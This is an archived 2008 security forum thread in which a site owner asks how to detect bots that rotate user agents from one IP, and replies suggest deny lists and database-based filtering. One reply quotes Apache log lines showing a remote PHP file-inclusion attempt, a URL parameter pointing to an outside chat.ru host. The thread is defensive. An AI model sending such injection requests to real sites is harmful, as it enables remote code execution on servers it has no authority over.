|
|
||||||
|
||||||
| Index Link To US Private Messages Archive FAQ RSS | ||||||
| Internet Security Discussion Forum This forum is for the discussion of security related issues. If you find a new Phishing scheme, spyware, virus or malicious site - let us know about it. If any of the above found you... here's where you ask for help. |
Share Thread: & Tags
|
||||
|
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
||||
|
Last Thursday, I developed and implemented a new logging system which aims to identify what products on my site are the most popular. The system is designed to be robust enough to both display to visitors a live list of what is popular, as well as show customized recommendations to users based on their browsing history. I designed the system to record not only the product viewed but the user's IP address and user agent, and record everything so I could get the largest data size possible to test the system with.
I came in today, and started analyzing the recorded data. In addition to the expected bots from Google/MSN/Yahoo, there were also the expected (and easily filtered) spambots. I also noticed a lot of visits from disguised bots, that I probably would never have found if not for the filters I added to this system. The following is from one such bot: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0) 220.95.108.239 2008-05-09 08:24:08 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 220.95.108.239 2008-05-09 08:31:45 Mozilla/5.0 (compatible; Googlebot/2.1; +How Google crawls my site) 220.95.108.239 2008-05-09 08:38:27 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 220.95.108.239 2008-05-09 08:44:52 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 220.95.108.239 2008-05-09 08:55:01 Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5 220.95.108.239 2008-05-09 09:23:43 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3 220.95.108.239 2008-05-09 09:31:08 Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0) 220.95.108.239 2008-05-09 09:36:59 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461) 220.95.108.239 2008-05-09 09:43:15 Mozilla/4.0 (compatible; MSIE 5.5; Windows 9 220.95.108.239 2008-05-09 09:48:44 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) 220.95.108.239 2008-05-09 09:56:14 Mozilla/4.0 (compatible; MSIE 5.5; Windows 9 220.95.108.239 2008-05-09 09:59:23 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 220.95.108.239 2008-05-09 10:02:03 Googlebot/2.1 (+How Google crawls my site) 220.95.108.239 2008-05-09 10:04:41 Of course, this is only the traffic from that one bot, on one product page. There are hits from literally hundreds of similar bots on the same page, and this is spread across thousands of product pages. Is there any way I might be able to programmatically filter these bad bots out? Even if it is just an SQL query that could spot the bots in a somewhat reliable way, and list them so I can remove them from the popularity system, and so I can add them to my deny list?
__________________
The best way to learn anything, is to question everything. |
|
|||
|
It doesn't look like a normal bot. It looks more like a malicious bot. I've been seeing a lot of these lately. My suggestion is that you capture the IP and user agent. Store the incoming data and then query the IP address and User Agent. If you have more than two user agents with the corresponding IP then add them to your deny list.
__________________
I use Country IP Blocks as added security for my networks and servers. |
|
|||
|
Quote:
80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)" 80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" 80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" 80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)" 80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" 80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9 80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" This "bot" initially pretends to be a Google bot but it quickly becomes apparent that such is not the case. It's obviously attempting to bypass traditional filters that rely on certain criteria. In this case it attempts to cloaks its identity by changing the platform and user agent. This in itself is the signature of undesirable traffic. In the above case I am redirecting the traffic elsewhere based on several different pieces of information: IP, Platform, User Agent and of course the obvious attempt to remotely inject a PHP script into the WordPress variables. In your case I think it is best to contain the IP address if it has more than two changes. This would include platform and user agent. You could also add a time element into the mix and use it as the deciding factor with the first two elements..
__________________
I use Country IP Blocks as added security for my networks and servers. Last edited by Tech Manager; 05-12-2008 at 05:57 PM. |
|
||||
|
Cool. My log does look quite similar to yours, so it is probably a similar system to what I am encountering. I guess the final part of this would be, is there a way I can specify a text file for Apache to use as a deny list that can be regularly updated without restarting the server?
__________________
The best way to learn anything, is to question everything. |
|
|||
|
You could use a text file but I suggest you use a database solution. Establish the acceptable criteria and then redirect traffic that doesn't meet that criteria. In fact, it's simple enough to redirect the traffic back to the questionable IP. You could even apprend the redirect with a message if you so choose.
Then you could add problematic IPs to your .htaccess file at a later date. But the database solution will be quicker and probably use less resources than loading the .htaccess file each time.
__________________
I use Country IP Blocks as added security for my networks and servers. Last edited by Tech Manager; 05-12-2008 at 06:06 PM. |
![]() |
|
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Finding humor in the deluge of spam emails! | TrafficProducer | The Castle Breakroom (General: Any Topic) | 3 | 04-08-2006 04:20 AM |
| Tracking Bots | bretlawson | Google Discussion Forum | 0 | 01-09-2005 04:09 PM |
| Search Bots | ohlson | Graphics & Design Discussion Forum | 1 | 09-10-2004 01:54 PM |
| Different Google Bots? | Pokeey | Google Discussion Forum | 1 | 03-08-2004 12:56 PM |
| Shallow Bots - Deep Bots? | jonathan-uk | Google Discussion Forum | 1 | 02-01-2004 09:32 PM |
|
WebProWorld |
Advertise |
Contact Us |
About |
Forum Rules |
MVP's |
Archive |
Newsletter Archive |
Top |
WebProNews
WebProWorld is an iEntry, Inc. ® site - © 2009 All Rights Reserved Privacy Policy and Legal iEntry, Inc. 2549 Richmond Rd. Lexington KY, 40509 |